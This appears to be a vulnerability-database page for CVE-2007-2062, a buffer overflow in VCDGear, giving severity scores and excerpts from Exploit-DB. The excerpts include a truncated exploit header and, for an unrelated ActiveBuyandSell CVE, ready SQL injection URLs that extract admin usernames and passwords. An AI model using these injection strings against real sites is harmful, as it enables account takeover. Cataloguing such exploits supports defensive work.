CVE-2007-2062
published 2007-04-18CVE-2007-2062: Stack-based buffer overflow in VCDGear 3.55 and 3.56 BETA allows user-assisted remote attackers to execute arbitrary code via a long FILE argument in a CUE…
PriorityP334critical9.3CVSS 2.0
AVNACMAuNCCICAC
EXPLOIT
EPSS
5.76%
92.1th percentile
Stack-based buffer overflow in VCDGear 3.55 and 3.56 BETA allows user-assisted remote attackers to execute arbitrary code via a long FILE argument in a CUE file.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| vcdgear | vcdgear | — | — |
| vcdgear | vcdgear | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
VCDGear 3.56 Build 050213 - 'FILE' Local Code Execution
exploitdb·2007-04-13
CVE-2007-2062 VCDGear 3.56 Build 050213 - 'FILE' Local Code Execution
VCDGear 3.56 Build 050213 - 'FILE' Local Code Execution
---
/* ~~~~~~~~~~~~~~0day~~~~~~~~~~~~~~~~~~
Discovered by: InTeL
Auther: InTeL
Attack Vector: SEH overwrite
Type: Local
Tested on Win2k SP4 (English)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Software: VCDGear v3.56 build 050213
Website: www.vcdgear.com
Description:
"VCDGear is a program designed to allow a user to extract MPEG streams from CD images, convert VCD files to MPEG,
correct MPEG errors, and more -- all in a single step. Initially developed back in late 1997, the program has
grown to do various extractions, conversions, and corrections on the fly. Cross-platform support will allow
different machines to process and generate output that is compatible between one another.
Total Buf Size: 2512 - [Junk - 324][SEH overwrite - 8][
Exploit-DB
ActiveBuyandSell 6.2 - 'buyersend.asp?catid' SQL Injection
exploitdb·2007-03-23
CVE-2005-2062 ActiveBuyandSell 6.2 - 'buyersend.asp?catid' SQL Injection
ActiveBuyandSell 6.2 - 'buyersend.asp?catid' SQL Injection
---
#Title : Active BuyandSell Remote SQL Injection Vulnerability
#Author : CyberGhost
#Demo Page : http://www.activewebsoftwares.com/demoactivebuyandsell
#Script Page : http://www.activewebsoftwares.com/productinfo.aspx?productid=8
#Vuln.
#Username : /buyersend.asp?catid=-1+union+select+0,1,2,3,4,5,6,adminname,8,9,0,1,2,3,4,5,6+from+admins
#Password : /buyersend.asp?catid=-1+union+select+0,1,2,3,4,5,6,password,8,9,0,1,2,3,4,5,6+from+admins
#Admin Login : /admin.asp
Thanx : redLine - Hackinger - excellance - Liarhack - SaCReD SeeR - MaTRax - KinSize - BolivaR - kerem125 - by_emR3
And All TURKISH HACKERS !
# milw0rm.com [2007-03-23]
No writeups or analysis indexed.
http://secunia.com/advisories/24884http://www.securityfocus.com/archive/1/465725/100/0/threadedhttp://www.securityfocus.com/bid/23475https://exchange.xforce.ibmcloud.com/vulnerabilities/33642https://www.exploit-db.com/exploits/3727http://secunia.com/advisories/24884http://www.securityfocus.com/archive/1/465725/100/0/threadedhttp://www.securityfocus.com/bid/23475https://exchange.xforce.ibmcloud.com/vulnerabilities/33642https://www.exploit-db.com/exploits/3727
2007-04-18
Published